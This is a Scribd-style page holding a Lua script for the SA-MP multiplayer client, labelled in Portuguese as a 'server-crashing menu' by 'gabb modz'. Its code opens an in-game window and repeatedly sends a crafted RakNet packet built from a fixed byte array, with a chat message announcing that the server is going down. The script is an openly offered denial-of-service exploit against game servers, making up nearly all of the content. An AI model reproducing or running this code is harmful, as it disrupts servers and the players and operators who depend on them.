0% found this document useful (0 votes)
23 views2 pages

Message

Uploaded by

cn313922
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
23 views2 pages

Message

Uploaded by

cn313922
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

local imgui = require 'mimgui'

local window_state = {false}

local function create_window()


imgui.SetNextWindowPos(imgui.ImVec2(500, 500), imgui.Cond.FirstUseEver,
imgui.ImVec2(0.5, 0.5))
imgui.SetNextWindowSize(imgui.ImVec2(245, 280), imgui.Cond.FirstUseEver)

if imgui.Begin('menu derrubador serve', window_state, imgui.WindowFlags.None)


then
if imgui.BeginTabBar('Tabs') then
if imgui.BeginTabItem('MENU PRINCIPAL') then
imgui.Button('DERRUBAR SERVE V1', imgui.ImVec2(200, 50))

local bytes = {
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0,
20, 50, 104, 127, 255, 191, 134, 0, 0, 0, 16, 112, 45, 0, 0
}

local bs = raknetNewBitStream()
for i = 1, #bytes do
raknetBitStreamWriteInt8(bs, bytes[i])
end

raknetSendBitStream(bs)
raknetDeleteBitStream(bs)

sampAddChatMessage("GABB MODZ|Serve caindo!! Continue..", -1)

imgui.EndTabItem()
end

imgui.TextColored(imgui.ImVec4(0, 1, 0, 1), 'by gabb modz')


imgui.EndTabBar()
end
imgui.End()
end
end

imgui.OnFrame(function()
return window_state[1]
end, create_window)

function main()
sampRegisterChatCommand('bygabb', function()
window_state[1] = not window_state[1]
end)

while true do
wait(0)
end
end

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy